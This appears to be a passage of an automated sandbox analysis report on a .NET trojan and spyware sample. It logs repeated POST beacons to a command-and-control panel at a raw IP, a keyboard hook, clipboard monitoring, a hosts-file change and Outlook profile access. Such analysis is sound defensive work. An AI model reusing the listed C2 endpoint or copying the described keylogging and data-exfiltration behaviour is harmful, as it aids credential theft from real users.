                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 380Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 380Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continueConnection: Keep-Alive
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.218
                  Source: unknownHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continueConnection: Keep-Alive
                  Source: file.exe, 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                  Source: file.exe, 00000000.00000002.614182008.0000000003258000.00000004.00000001.sdmpString found in binary or memory: http://64.188.18.218
                  Source: file.exe, 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmpString found in binary or memory: http://64.188.18.218/webpanel-trade/inc/eea5c8636b504d.php
                  Source: file.exe, 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmpString found in binary or memory: http://64.188.18.218/webpanel-trade/inc/eea5c8636b504d.php127.0.0.1POST
                  Source: file.exe, 00000000.00000002.614182008.0000000003258000.00000004.00000001.sdmpString found in binary or memory: http://64.188.18.218x&
                  Source: file.exe, 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                  Source: file.exe, 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmpString found in binary or memory: http://ymuZnB.com
                  Source: file.exe, 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%(
                  Source: file.exe, 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                  Source: file.exe, 00000000.00000002.614009844.00000000031DD000.00000004.00000001.sdmpString found in binary or memory: https://qL4JAKSuGatRwuRZIZxu.com
                  Source: file.exeString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                  Source: file.exe, 00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

                  Key, Mouse, Clipboard, Microphone and Screen Capturing:

                  barindex
                  Installs a global keyboard hookShow sources
                  Source: C:\Users\user\Desktop\file.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\file.exeJump to behavior
                  Source: C:\Users\user\Desktop\file.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                  Spam, unwanted Advertisements and Ransom Demands:

                  barindex
                  Modifies the hosts fileShow sources
                  Source: C:\Users\user\Desktop\file.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                  System Summary:

                  barindex
                  .NET source code contains very large array initializationsShow sources
                  Source: file.exe, u003cPrivateImplementationDetailsu003eu007bE8C26188u002d0CCBu002d4AC0u002d8B11u002d8FD1685A3376u007d/DD56AB72u002dC86Bu002d4D01u002dAE5Fu002dAD08782C2927.csLarge array initialization: .cctor: array initializer size 12062
                  Source: 0.0.file.exe.8d0000.0.unpack, u003cPrivateImplementationDetailsu003eu007bE8C26188u002d0CCBu002d4AC0u002d8B11u002d8FD1685A3376u007d/DD56AB72u002dC86Bu002d4D01u002dAE5Fu002dAD08782C2927.csLarge array initialization: .cctor: array initializer size 12062
                  Source: 0.2.file.exe.8d0000.0.unpack, u003cPrivateImplementationDetailsu003eu007bE8C26188u002d0CCBu002d4AC0u002d8B11u002d8FD1685A3376u007d/DD56AB72u002dC86Bu002d4D01u002dAE5Fu002dAD08782C2927.csLarge array initialization: .cctor: array initializer size 12062
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010DB0BA NtQuerySystemInformation,0_2_010DB0BA
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010DB089 NtQuerySystemInformation,0_2_010DB089
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD1D600_2_00DD1D60
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DDB6C50_2_00DDB6C5
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD36080_2_00DD3608
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02B6A2200_2_02B6A220
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02B6882C0_2_02B6882C
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02B6E8480_2_02B6E848
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02B6A7AE0_2_02B6A7AE
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02B6D1100_2_02B6D110
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02B6D5580_2_02B6D558
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02B6B1900_2_02B6B190
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_058473000_2_05847300
                  Source: file.exeBinary or memory string: OriginalFilename vs file.exe
                  Source: file.exe, 00000000.00000002.610772201.0000000000E00000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewshom.ocx vs file.exe
                  Source: file.exe, 00000000.00000002.615455546.0000000005710000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs file.exe
                  Source: file.exe, 00000000.00000002.611154670.0000000000FC0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs file.exe
                  Source: file.exe, 00000000.00000002.610250985.00000000008D2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameEZTKkaWdprxlDwjYETFCzOmRFvHFnuJlnmFKCb.exe4 vs file.exe
                  Source: file.exe, 00000000.00000002.611249212.00000000010A0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewshom.ocx.mui vs file.exe
                  Source: file.exeBinary or memory string: OriginalFilenameEZTKkaWdprxlDwjYETFCzOmRFvHFnuJlnmFKCb.exe4 vs file.exe
                  Source: file.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Source: file.exe, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: file.exe, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: 0.0.file.exe.8d0000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: 0.0.file.exe.8d0000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: 0.2.file.exe.8d0000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: 0.2.file.exe.8d0000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@1/2@0/1
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010DAF3E AdjustTokenPrivileges,0_2_010DAF3E
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010DAF07 AdjustTokenPrivileges,0_2_010DAF07
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\jbvm20a0.pwnJump to behavior
                  Source: C:\Users\user\Desktop\file.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                  Source: file.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\file.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: file.exeVirustotal: Detection: 53%
                  Source: file.exeReversingLabs: Detection: 47%
                  Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
                  Source: file.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Source: Binary string: mscorrc.pdb source: file.exe, 00000000.00000002.611154670.0000000000FC0000.00000002.00000001.sdmp
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D24C4 push esi; ret 0_2_010D24DE
                  Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
